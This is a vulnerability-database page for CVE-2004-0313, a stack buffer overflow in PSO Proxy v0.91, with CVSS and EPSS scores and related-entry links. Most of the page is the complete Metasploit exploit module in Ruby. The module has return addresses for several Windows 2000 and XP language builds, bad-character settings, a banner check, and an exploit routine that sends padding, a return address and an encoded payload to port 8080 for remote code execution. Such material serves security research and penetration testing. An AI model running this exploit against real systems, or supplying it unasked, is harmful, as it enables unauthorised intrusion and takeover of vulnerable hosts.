Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
metasploitAushack <[email protected]>MSF:EXPLOIT-WINDOWS-HTTP-PSOPROXY91_OVERFLOW-
HistorySep 09, 2007 - 10:37 p.m.

PSO Proxy v0.91 Stack Buffer Overflow

2007-09-0922:37:43
aushack <[email protected]>
www.rapid7.com
9

CVSS2

10

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

AI Score

7.9

Confidence

Low

EPSS

0.298

Percentile

97.0%

JSON

This module exploits a buffer overflow in the PSO Proxy v0.91 web server. If a client sends an excessively long string the stack is overwritten.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'PSO Proxy v0.91 Stack Buffer Overflow',
      'Description'    => %q{
        This module exploits a buffer overflow in the PSO Proxy v0.91 web server.
        If a client sends an excessively long string the stack is overwritten.
      },
      'Author'         => [ 'aushack' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2004-0313' ],
          [ 'OSVDB', '4028' ],
          [ 'EDB', '156' ],
          [ 'BID', '9706' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'    => 370,
          'BadChars' => "\x00\x0a\x0d\x20",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
        # Patrick - Tested OK 2007/09/06 against w2ksp0, w2ksp4, xpsp0,xpsp2 en.
          [ 'Windows 2000 Pro SP0-4 English',  { 'Ret' => 0x75023112 } ], # call ecx ws2help.dll
          [ 'Windows 2000 Pro SP0-4 French',   { 'Ret' => 0x74fa3112 } ], # call ecx ws2help.dll
          [ 'Windows 2000 Pro SP0-4 Italian',  { 'Ret' => 0x74fd3112 } ], # call ecx ws2help.dll
          [ 'Windows XP Pro SP0/1 English',    { 'Ret' => 0x71aa396d } ], # call ecx ws2help.dll
          [ 'Windows XP Pro SP2 English',	     { 'Ret' => 0x71aa3de3 } ], # call ecx ws2help.dll
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2004-02-20'
      ))

    register_options(
      [
        Opt::RPORT(8080),
      ])
  end

  def check
    connect
    sock.put("GET / HTTP/1.0\r\n\r\n")
    banner = sock.get_once
    if (banner.to_s =~ /PSO Proxy 0\.9/)
      return Exploit::CheckCode::Appears
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    connect

    exploit = rand_text_alphanumeric(1024, payload_badchars)
    exploit += [target['Ret']].pack('V') + payload.encoded

    sock.put(exploit + "\r\n\r\n")

    disconnect
    handler
  end
end

Related

cvelist 1
exploitdb 5
packetstorm 1
nvd 1
cve 1
cvelist
cvelist
CVE-2004-0313
2004-03-18 05:00:00
exploitdb
exploitdb
PSOProxy 0.91 - Stack Buffer Overflow (Metasploit)
2010-05-09 00:00:00
PSOProxy 0.91 - Remote Buffer Overflow (2)
2004-02-20 00:00:00
PSOProxy 0.91 - Remote Buffer Overflow (1)
2004-02-20 00:00:00
packetstorm
packetstorm
PSO Proxy v0.91 Stack Overflow
2009-11-26 00:00:00
nvd
nvd
CVE-2004-0313
2004-11-23 05:00:00
cve
cve
CVE-2004-0313
2004-11-23 05:00:00

CVSS2

10

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

AI Score

7.9

Confidence

Low

EPSS

0.298

Percentile

97.0%

JSON
Related for MSF:EXPLOIT-WINDOWS-HTTP-PSOPROXY91_OVERFLOW-
cvelist1exploitdb5packetstorm1nvd1cve1